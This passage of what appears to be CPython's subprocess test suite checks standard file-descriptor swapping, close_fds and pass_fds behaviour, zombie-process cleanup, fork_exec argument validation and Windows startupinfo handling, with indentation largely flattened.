finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
    # When duplicating fds, if one of the fds involved is 0, 1 or 2, it can end
    # up being overwritten before it is used (#12607). test_swap_fds exercises
    # all orderings of the standard fds.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
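            # Close the one standard fd (0, 1 or 2) that is not backed by a temp
            # file, so the remapping below runs with a closed std descriptor.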
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
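                # e.g. from_fds=(0, 1) and to_fds=(1, 2) results in passing
                # stdout=0 and stderr=1 to subprocess.call() (illustrative values).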
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
            # The pure Python implementation keeps the original message
self.assertIsNone(subprocess._fork_exec)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._fork_exec)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
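        # fd_status.py is expected to print the fds open in the child as a
        # comma-separated list, which is parsed below.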
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
        # +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
                # Leave a couple of pairs of low fds available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = import_helper.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
support.gc_collect() # For PyPy or other GCs.
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, 0,
False, [], 0, -1,
func, False)
                # Prevent a generic
                # "TypeError: fork_exec() takes exactly N arguments (M given)"
                # from letting the test pass. Ideally we would start with a valid
                # *args list, confirm that a good call works, and then mutate it
                # in various ways to check that each bad call raises a TypeError
                # for the offending argument. Saving that refactoring for a
                # future PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
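            # __int__ returns a real value only on the first call and raises
            # ValueError afterwards, to exercise error handling partway through
            # the conversion of fds_to_keep.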
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, 0,
None, None, None, -1,
None, "no vfork")
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
support.wait_process(proc.pid, exitcode=0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
support.wait_process(proc.pid, exitcode=0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
        # Don't check the returncode value: the test already read the exit
        # status, so Popen cannot read it and falls back to a default returncode.
self.assertIsNotNone(proc.returncode)
def test_send_signal_race2(self):
        # bpo-40550: the process might exit between the returncode check and
        # the kill operation
p = subprocess.Popen([sys.executable, '-c', 'exit(1)'])
# wait for process to exit
while not p.returncode:
p.poll()
with mock.patch.object(p, 'poll', new=lambda: None):
p.returncode = None
p.send_signal(signal.SIGTERM)
p.kill()
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
        # We use hardcoded constants because we do not want to
        # depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
        STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
            dwFlags=STARTF_USESHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with warnings_helper.check_warnings((".*overriding close_fds",
RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
